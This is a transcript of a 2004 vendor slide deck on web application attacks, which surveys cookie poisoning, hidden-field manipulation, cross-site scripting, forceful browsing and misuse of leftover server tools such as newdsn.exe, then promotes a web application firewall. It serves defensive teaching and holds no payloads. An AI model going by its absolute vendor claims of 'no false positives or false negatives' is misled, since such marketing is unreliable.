Presentation is loading. Please wait.

Presentation is loading. Please wait.

Closing the Door on Web Application Attacks FISSEA 2004 Confidential and proprietary information ©2004, MagniFire Websystems Inc.

Published byBernice Leonard Modified over 9 years ago

Similar presentations

Presentation on theme: "Closing the Door on Web Application Attacks FISSEA 2004 Confidential and proprietary information ©2004, MagniFire Websystems Inc."— Presentation transcript:

1 Closing the Door on Web Application Attacks FISSEA 2004 Confidential and proprietary information ©2004, MagniFire Websystems Inc.

2 2 2 Today’s Session n What are the risks? n Why don’t traditional solutions work? n What can be done?

3 3 Confidential and proprietary information ©2004, MagniFire Websystems Inc. 3 Ensuring 100% protection In Israel the government has an effective way to protect sensitive data from internet hackers…

4 4 Confidential and proprietary information ©2004, MagniFire Websystems Inc. 4 However, Government Is Moving Online Unique Audience (2002) (Source: Nielson NetRatings)

5 5 Confidential and proprietary information ©2004, MagniFire Websystems Inc. 5 Web Servers and Web Applications: Prime Targets for Attacks n “64% of the 10 million security incidents Security Focus tracked the first week of Feb 2002, targeted port 80.” (Information Week magazine) n “Nearly 70% of all attacks in the first quarter of 2002 used port 80, a common port devoted to Web traffic.” (ISS Internet Risk Impact Summary Report for 2002)

6 6 Confidential and proprietary information ©2004, MagniFire Websystems Inc. 6 What are the Risks ? n Access to user databases l Social Security Numbers (CA) l Police Records (MI) n Financial loss as a result of fraud n Theft of secure or sensitive information

7 7 Confidential and proprietary information ©2004, MagniFire Websystems Inc. 7 Web Applications Are The Weakest Point System Network Desktop Access Net IDS Host IDS & Secure OS Firewall Antivirus Application DATA “64% of the 10 million security incidents tracked targeted port 80.” (Information Week magazine)

8 8 Confidential and proprietary information ©2004, MagniFire Websystems Inc. 8 Major Categories of Web Application Vulnerabilities Almost all Web applications are exposed “From 45 applications, @stake found nearly 500 ‘significant’ security defects, with an average of at least 10 per assessment” (@Stake Study on Web application security) n Improper validation of user input by the Web application server side (relying on client side validation): l Cookie Poisoning l Hidden Field Manipulation l Parameter Tampering l Stealth Commanding (e.g. SQL/OS Injection) l Cross-site Scripting l Application Buffer Overflow l URL & Unicode encoding n Backdoors and Debugs option (left in the application) n Poor Session Management, Access Control & Authentication n Third Party Misconfiguration

9 9 Confidential and proprietary information ©2004, MagniFire Websystems Inc. 9 – Modifying form fields allowing damaging data to pass to the web application – Example: Online Retail Store l Changing prices and stealing goods l Hidden field hacking in 3rd party shopping cart software Hidden Field Manipulation

10 10 Confidential and proprietary information ©2004, MagniFire Websystems Inc. 10 Hidden Field Manipulation - Example

11 11 Confidential and proprietary information ©2004, MagniFire Websystems Inc. 11 Hidden Field Manipulation - Example

12 12 Confidential and proprietary information ©2004, MagniFire Websystems Inc. 12 Hidden Field Manipulation - Example

13 13 Confidential and proprietary information ©2004, MagniFire Websystems Inc. 13 Hidden Field Manipulation - Example

14 14 Confidential and proprietary information ©2004, MagniFire Websystems Inc. 14 Hidden Field Manipulation - Example

15 15 Confidential and proprietary information ©2004, MagniFire Websystems Inc. 15 Cookie Poisoning – Modifying the cookie file causing the return of unauthorized information or enabling performance of activity on behalf of another user – Example: Online account administration – Impersonation

16 16 Confidential and proprietary information ©2004, MagniFire Websystems Inc. 16 Cookie Poisoning - Example

17 17 Confidential and proprietary information ©2004, MagniFire Websystems Inc. 17 Cookie Poisoning - Example

18 18 Confidential and proprietary information ©2004, MagniFire Websystems Inc. 18 Cookie Poisoning - Example

19 19 Confidential and proprietary information ©2004, MagniFire Websystems Inc. 19 Cookie Poisoning - Example

20 20 Confidential and proprietary information ©2004, MagniFire Websystems Inc. 20 Cookie Poisoning - Example

21 21 Confidential and proprietary information ©2004, MagniFire Websystems Inc. 21 Buffer Overflow – Sending too much data in a request to the application, attacking either 3rd party or internally developed code

22 22 Confidential and proprietary information ©2004, MagniFire Websystems Inc. 22 Buffer Overflow - Example

23 23 Confidential and proprietary information ©2004, MagniFire Websystems Inc. 23 Buffer Overflow - Example

24 24 Confidential and proprietary information ©2004, MagniFire Websystems Inc. 24 Buffer Overflow - Example

25 25 Confidential and proprietary information ©2004, MagniFire Websystems Inc. 25 Cross Site Scripting – Inserting scripting languages into text fields to be displayed to other users – Example: Add an Item Section of Web Site Site defacement Changing field parameters

26 26 Confidential and proprietary information ©2004, MagniFire Websystems Inc. 26 Cross Site Scripting - Example

27 27 Confidential and proprietary information ©2004, MagniFire Websystems Inc. 27 Cross Site Scripting - Example

28 28 Confidential and proprietary information ©2004, MagniFire Websystems Inc. 28 Cross Site Scripting - Example

29 29 Confidential and proprietary information ©2004, MagniFire Websystems Inc. 29 Cross Site Scripting - Example

30 30 Confidential and proprietary information ©2004, MagniFire Websystems Inc. 30 Cross Site Scripting - Example

31 31 Confidential and proprietary information ©2004, MagniFire Websystems Inc. 31 Known Vulnerabilities & Misconfiguration – Exploiting configuration errors in 3rd party components, such as web and database servers – Newdsn.exe can be used by an attacker to create files anywhere on your disk if they have the NTFS correct file permissions to do so. Newdsn.exe can also be used to overwrite the DSNs on existing on-line databases making the information contained in the database inaccessible. This file, getdrvrs.exe, dsnform.exe and mkilog.exe should be deleted.

32 32 Confidential and proprietary information ©2004, MagniFire Websystems Inc. 32 Known Vulnerabilities & Misconfiguration

33 33 Confidential and proprietary information ©2004, MagniFire Websystems Inc. 33 Known Vulnerabilities & Misconfiguration

34 34 Confidential and proprietary information ©2004, MagniFire Websystems Inc. 34 Parameter Tampering – Modify the parameters being passed as part of the URL – Example: Online Auction Site User Account Access Forbidden SQL Query via wrong parameters

35 35 Confidential and proprietary information ©2004, MagniFire Websystems Inc. 35 Parameter Tampering - Example

36 36 Confidential and proprietary information ©2004, MagniFire Websystems Inc. 36 Parameter Tampering - Example

37 37 Confidential and proprietary information ©2004, MagniFire Websystems Inc. 37 Forceful Browsing – Jumping directly to pages that can normally only be accessed through authentication mechanisms – Example: Auction Web Site Breaching users’ privacy Direct file access

38 38 Confidential and proprietary information ©2004, MagniFire Websystems Inc. 38 Forceful Browsing - Example

39 39 Confidential and proprietary information ©2004, MagniFire Websystems Inc. 39 Forceful Browsing - Example

40 40 Confidential and proprietary information ©2004, MagniFire Websystems Inc. 40 Forceful Browsing - Example

41 41 Confidential and proprietary information ©2004, MagniFire Websystems Inc. 41 Reasons for Web Application Vulnerabilities n Applications were written according to client-server security standards (rely on client-side validation) n The complexity of platforms and environments makes secure coding very difficult n Web developers focus on functionality and performance, not on security n Web developers are not trained for secure programming n Bugs in Web infrastructure (OS and Web platforms) and Web applications n Web sites are changed/updated frequently Threat is exacerbated by the availability of: l Web application client-side source code (hackers gain information for planning attacks) l Widely available, free, easy to use hacking tools

42 42 Confidential and proprietary information ©2004, MagniFire Websystems Inc. 42 Existing Security Solutions are Inadequate

43 43 Confidential and proprietary information ©2004, MagniFire Websystems Inc. 43 Traditional Security Solutions Don’t Protect Web Applications Current solutions are not enough (CSI & FBI 2002): 89% of respondents have a firewall 60% of respondents used at least one Intrusion Detection System However: 40% reported system penetration from the outside 40% reported DoS attacks Firewalls: “Firewalls offer little protection at the application layer because ports within the firewall have to be left open for communication” (IDC 2002) Network IDS : “Intrusion detection systems are a market failure, and vendors are now hyping intrusion prevention systems, which have also stalled. Functionality is moving into firewalls, which will perform deep packet inspection for content and malicious traffic blocking, as well as antivirus activities." (Gartner, 2003)

44 44 Confidential and proprietary information ©2004, MagniFire Websystems Inc. 44 Fundamental Problem with IPS/IDS: ‘Negative Security Logic’ How It Works: Let everything through except what can be identified as malicious traffic (based on attack signatures & traffic characteristics) Problems  Protects only against known attacks (signature and/or characteristics are known and defined)  Requires constant updating of attack signatures and / or characteristics database  Doesn’t protect against “Zero Day” attacks  Doesn’t protect against attacks based on illegal user input:  Cookie Poisoning and Hidden-Field Manipulation  Parameter (Form-Field) Tampering  Forceful Browsing  Backdoors and debug-option exploitation

45 45 Confidential and proprietary information ©2004, MagniFire Websystems Inc. 45 HIPSNIPSFW TrafficShield Yes LimitedYesKnown Web Worms PartialLimitedNoYesUnknown Web Worms YesPartialLimitedYesKnown Web Vulnerabilities PartialLimitedNoYesUnknown Web Vulnerabilities YesNoLimitedYesIllegal Access to Web-server files No YesForceful Browsing NoLimitedNoYesFile/Directory Enumerations No YesBrute Force attacks PartialLimited YesBuffer Overflow NoLimited YesCross-Site Scripting PartialNo YesSQL/OS Injection No YesCookie Poisoning YesNo YesHidden-Field Manipulation No YesParameter Tampering NoLimited YesFlood attacks (GET, 404) NoLimitedNoYesSSL Flooding Traditional Security Solutions Don’t Protect Web Applications

46 46 Confidential and proprietary information ©2004, MagniFire Websystems Inc. 46 Current Application-Layer Approaches Scanning HTML code for known breaches and then rewriting it is ineffective and costly compared to installing an application firewall. l Time-Consuming due to high rate of false positives that must be evaluated. l Ineffective since it does not find all vulnerabilities, thereby requiring additional techniques (e.g. manual code review) in order to ensure protection. l Requires Code Rewrites which are very expensive in terms of both time and resources l Slows Down Product Development since every change in the application requires new “scan & fix” iteration l Useless for 3rd party web applications since they can’t be altered l Defenseless against new threats, since it only looks for known vulnerabilities Scan-and-Fix

47 47 Confidential and proprietary information ©2004, MagniFire Websystems Inc. 47 The Solution: Granular & Tailored Application-Specific Security

48 48 Confidential and proprietary information ©2004, MagniFire Websystems Inc. 48 Solution Criteria Web Application Firewall Using Positive Security Logic Model application extremely accurately Auto configuration / customization around app No false positives or false negatives Minimal ongoing policy management No latency introduced (<1 ms) 1 2 3 4 5

49 49 Confidential and proprietary information ©2004, MagniFire Websystems Inc. 49 Web Application Model the Application Flow Application Flow Application Flow Model CHANGE USER ID Actions not known to be legal can now be blocked. - wrong page order - invalid parameter - invalid value - etc.

50 50 Confidential and proprietary information ©2004, MagniFire Websystems Inc. 50 The Application Flow Model n Legal user will request: l Links existing in the Web page currently browsed OR l Web pages which are entry points to the app n Thus, a legal request to a Web page should always have two characteristics: l It should come from a link embedded in the original page browsed by the user* l It should comply with the request definition in the Web page the user is currently browsing, defining:  Request method  Request parameters  Request parameters values Application Flow Model An accurate representation of the designed interaction between the user and the Web application * Unless the page requested is the entry point to the Web application.

51 51 Confidential and proprietary information ©2004, MagniFire Websystems Inc. 51 The Application Flow Model n Stateful - Tracks which pages a user is coming from, and the specific permissions associated with that context. l A request which is perfectly legal within the context of one page might be inappropriate for a user on another page n Bidirectional - Looks at server responses to the client as well as client requests to the server. l Essential to verify that the user hasn’t attempted to tamper with the credentials sent to him in his response n Granular – Complete logical rendering of the transitions between every page, including every object, every parameter of each object, and every legal value within each object parameter. Application Flow Model The only way to provide total security in front of Web applications (the only way to replace embedded security code)

52 52 Confidential and proprietary information ©2004, MagniFire Websystems Inc. 52 Hybrid Policy Generator: Creating the Application Flow Model Automatic analysis of Web page content. l Purpose-built crawler l Complete analysis of the Web page content, including active code such as JavaScript, l ‘Learns’ all details of the interaction between the user and the Web application. Iterative policy adjustment. l Examines how users interact with application over time, based on real-life traffic. l Recommends adjustments to the current policy, based on the on-line analysis on the rejected traffic.

53 53 Confidential and proprietary information ©2004, MagniFire Websystems Inc. 53 Model User Flow Static Parameters Active- Code Analysis Dynamic Parameters Accurate Security Policy Crawler based Learning Yes No Request based Learning NoLimitedNo Response based Learning PartialYesNoYesNo Hybrid ApproachYes Hybrid policy generation combines crawler-based application modeling with adjustments based on real-life request analysis – Request based learning is very useful to detect missing elements in policy – Response based learning is limited in its analysis to avoid significant latency Hybrid Policy Generator

54 54 Confidential and proprietary information ©2004, MagniFire Websystems Inc. 54 No False Positives, No False Negatives Constraints that prevent vulnerabilities in certain cases can cause “False Positives” in other cases Low granular policy means Either false positives OR low security (false negatives) due to relaxed policy n The solution: Granular Security Policy that is accurately adjusted to the protected Web-application Constraints are adjusted to Web-application Flow Model (no need to relax security constraints) Policy enforcement takes into account user state No False Positives (constraints are not used when they are not applicable)

55 55 Confidential and proprietary information ©2004, MagniFire Websystems Inc. 55 Low Latency Security Policy enforcement is translated into hash searches Hardened Linux Appliance Ease deployment Eliminates misconfiguration Optimized performance and throughput Scalable Architecture - Shield units can be added to handle larger traffic volumes Automatic recovery from unit failure based on the fact that units are identical and can switch roles Central and secure management

56 56 Confidential and proprietary information ©2004, MagniFire Websystems Inc. 56 Solution Criteria Solution Model application extremely accurately Auto configuration / customization around app No false positives or false negatives Minimal ongoing policy management No latency introduced (<1 ms) Crawling & full analysis of web pages Adjustments based on real-life traffic ‘Learning Mode’ automatically recommends policy adjustments based on customer activity Any non-recognized activity is blocked Automated mapping & policy suggestions Appliance: fits into web infrastructure Automatic detection of website changes and suggestions for newly-tailored policy Network appliance with modified OS for high throughput 1 2 3 4 5

57 57 Confidential and proprietary information ©2004, MagniFire Websystems Inc. 57 Thank You! Confidential and proprietary information ©2003, MagniFire Websystems Inc.

Download ppt "Closing the Door on Web Application Attacks FISSEA 2004 Confidential and proprietary information ©2004, MagniFire Websystems Inc."

Similar presentations

Security Issues and Challenges in Cloud Computing

Security Issues and Challenges in Cloud Computing
Building Your Own Firewall Chapter 10. Learning Objectives List and define the two categories of firewalls Explain why desktop firewalls are used Explain.

Building Your Own Firewall Chapter 10. Learning Objectives List and define the two categories of firewalls Explain why desktop firewalls are used Explain.
Barracuda Web Application Firewall

Barracuda Web Application Firewall
 Firewalls and Application Level Gateways (ALGs)  Usually configured to protect from at least two types of attack ▪ Control sites which local users.

 Firewalls and Application Level Gateways (ALGs)  Usually configured to protect from at least two types of attack ▪ Control sites which local users.
It’s always better live. MSDN Events Security Best Practices Part 2 of 2 Reducing Vulnerabilities using Visual Studio 2008.

It’s always better live. MSDN Events Security Best Practices Part 2 of 2 Reducing Vulnerabilities using Visual Studio 2008.
WEB SECURITY. WEB ATTACK TYPES Buffer OverflowsXML InjectionsSession Hijacking Attacks WEB Attack Types.

WEB SECURITY. WEB ATTACK TYPES Buffer OverflowsXML InjectionsSession Hijacking Attacks WEB Attack Types.
8.1 © 2007 by Prentice Hall 8 Chapter Securing Information Systems.

8.1 © 2007 by Prentice Hall 8 Chapter Securing Information Systems.
8.1 © 2007 by Prentice Hall 8 Chapter Securing Information Systems.

8.1 © 2007 by Prentice Hall 8 Chapter Securing Information Systems.
Information Networking Security and Assurance Lab National Chung Cheng University The Ten Most Critical Web Application Security Vulnerabilities Ryan J.W.

Information Networking Security and Assurance Lab National Chung Cheng University The Ten Most Critical Web Application Security Vulnerabilities Ryan J.W.
Information Networking Security and Assurance Lab National Chung Cheng University 1 Top Vulnerabilities in Web Applications (I) Unvalidated Input:  Information.

Information Networking Security and Assurance Lab National Chung Cheng University 1 Top Vulnerabilities in Web Applications (I) Unvalidated Input:  Information.
ASP.NET 2.0 Chapter 6 Securing the ASP.NET Application.

ASP.NET 2.0 Chapter 6 Securing the ASP.NET Application.
Computer Security and Penetration Testing

Computer Security and Penetration Testing
Lesson 9-Securing a Network. Overview Identifying threats to the network security. Planning a secure network.

Lesson 9-Securing a Network. Overview Identifying threats to the network security. Planning a secure network.
Jonas Thomsen, Ph.d. student Computer Science University of Aarhus Best Practices and Techniques for Building Secure Microsoft.

Jonas Thomsen, Ph.d. student Computer Science University of Aarhus Best Practices and Techniques for Building Secure Microsoft.
Network Infrastructure Security. LAN Security Local area networks facilitate the storage and retrieval of programs and data used by a group of people.

Network Infrastructure Security. LAN Security Local area networks facilitate the storage and retrieval of programs and data used by a group of people.
Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software

Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software
 A cookie is a piece of text that a Web server can store on a user's hard disk.  Cookie data is simply name-value pairs stored on your hard disk by.

 A cookie is a piece of text that a Web server can store on a user's hard disk.  Cookie data is simply name-value pairs stored on your hard disk by.
D ATABASE S ECURITY Proposed by Abdulrahman Aldekhelallah University of Scranton – CS521 Spring2015.

D ATABASE S ECURITY Proposed by Abdulrahman Aldekhelallah University of Scranton – CS521 Spring2015.
Martin Kruliš 2. 4. 2015 by Martin Kruliš (v1.0)1.

Martin Kruliš by Martin Kruliš (v1.0)1.
Security and Risk Management. Who Am I Matthew Strahan from Content Security Principal Security Consultant I look young, but I’ve been doing this for.

Security and Risk Management. Who Am I Matthew Strahan from Content Security Principal Security Consultant I look young, but I’ve been doing this for.

Similar presentations

Ads by Google